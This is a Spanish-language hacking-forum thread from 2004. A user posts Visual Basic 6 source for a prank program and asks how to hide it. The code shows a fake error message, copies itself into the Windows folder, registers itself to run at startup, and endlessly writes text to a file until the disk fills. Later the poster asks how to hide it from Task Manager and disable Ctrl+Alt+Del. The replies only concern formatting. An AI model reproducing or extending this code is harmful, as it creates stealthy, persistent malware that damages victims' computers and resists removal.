elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ayuda con un codigo en visual basic
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con un codigo en visual basic  (Leído 3,835 veces)
Villamil

Desconectado Desconectado

Mensajes: 95


¿Que se supone que tenog que poner aquí?


Ver Perfil WWW
ayuda con un codigo en visual basic
« en: 29 Julio 2004, 23:03 pm »

el siguiente codigo:
-------------------
Código:
Private Sub Form_Load()
On Error Resume Next
Form1.Hide
Set comprovar = CreateObject("scripting.filesystemobject")
Set archivo = CreateObject("scripting.filesystemobject")
Set escribir = archivo.CreateTextFile("C:\porkeria.txt", False)
Set inicio = CreateObject("WScript.Shell")
If (comprovar.FileExists("C:\WINDOWS\pork.EXE")) = False Then
MsgBox "Error durante la aplicación. Deberá cerrarse", vbCritical, "ERROR"
FileCopy App.EXEName & ".EXE", "C:\WINDOWS\pork.EXE"
inicio.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pork", "C:\WINDOWS\pork.exe"
End If
Do
escribir.write "jAjAjAjAjA...   jAjAjAjAjA...   jAjAjAjAjA...   jAjAjAjAjA...   jAjAjAjAjA...   "
Loop
End Sub
--------------------
lo que pasa es k haces control+alt+supr y se kita, como hago para que me salga en procesos en lugar de aplicaciones??? es k en procesos es + dificil de buscar..

NOTA DEL MODERADOR: Si poneís los códigos, hacedlo dentro del tag code :)


« Última modificación: 30 Julio 2004, 06:36 am por Cobac » En línea

zheo


Desconectado Desconectado

Mensajes: 707



Ver Perfil
Re: ayuda con un codigo en visual basic
« Respuesta #1 en: 30 Julio 2004, 06:04 am »

etiquetas CODE


En línea

Sólo hay 10 tipos de personas: las que saben binario y las que no.

¿Quieres programar un videojuego? Si quieres unirte pulsa aqui
Villamil

Desconectado Desconectado

Mensajes: 95


¿Que se supone que tenog que poner aquí?


Ver Perfil WWW
Re: ayuda con un codigo en visual basic
« Respuesta #2 en: 3 Agosto 2004, 21:19 pm »

1º.-
etiquetas CODE
¿que es eso?
2º.- alguien puede poner el codigo para desabilitar esas teclas???
3º.- si se desabilitan, ai alguna forma de quitar el programa??? como??? (por auto-prevención)
En línea

zheo


Desconectado Desconectado

Mensajes: 707



Ver Perfil
Re: ayuda con un codigo en visual basic
« Respuesta #3 en: 3 Agosto 2004, 21:48 pm »

1º.-
etiquetas CODE
¿que es eso?

Hay un post en el foro -que veo no te has leido- titulado "leer antes de postear" que lo explica.
En línea

Sólo hay 10 tipos de personas: las que saben binario y las que no.

¿Quieres programar un videojuego? Si quieres unirte pulsa aqui
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con este codigo para Visual Basic 2010 Porfavor ;(
.NET (C#, VB.NET, ASP)
BrokerJoker 4 4,172 Último mensaje 8 Diciembre 2011, 12:08 pm
por BrokerJoker
Ayuda con Codigo en Visual Basic 6.0
.NET (C#, VB.NET, ASP)
bsosa 1 1,957 Último mensaje 25 Enero 2012, 20:56 pm
por $Edu$
AYUDA CON UN CODIGO DE VISUAL BASIC
.NET (C#, VB.NET, ASP)
ronmslas 1 1,584 Último mensaje 28 Febrero 2016, 22:15 pm
por Eleкtro
MOVIDO: AYUDA CON UN CODIGO DE VISUAL BASIC
Programación Visual Basic
Eleкtro 0 1,562 Último mensaje 28 Febrero 2016, 21:53 pm
por Eleкtro
Ayuda: Código en Visual Basic 6.0
Programación Visual Basic
jduo 6 3,683 Último mensaje 20 Noviembre 2017, 00:57 am
por Serapis
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines